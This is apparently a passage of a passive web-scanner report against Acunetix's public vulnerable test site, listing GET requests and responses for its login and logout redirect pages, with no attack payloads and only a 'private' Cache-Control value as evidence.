<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 399 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3256 |
| Response Body - size: 3,256 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 398 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 222 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Search.asp?tfSearch=ZAP Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 145 |
| Response Body - size: 145 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Search.asp?tfSearch=ZAP">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 388 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=0 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=0">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 388 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=1 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=1">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 388 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 217 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showforum.asp?id=2 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 140 |
| Response Body - size: 140 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showforum.asp?id=2">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=0 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=0">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=1 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=1">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=10 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=10">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=11 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=11">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=12 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=12">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=13 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=13">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=14 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=14">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=15 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=15">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=16 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=16">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=17 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=17">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
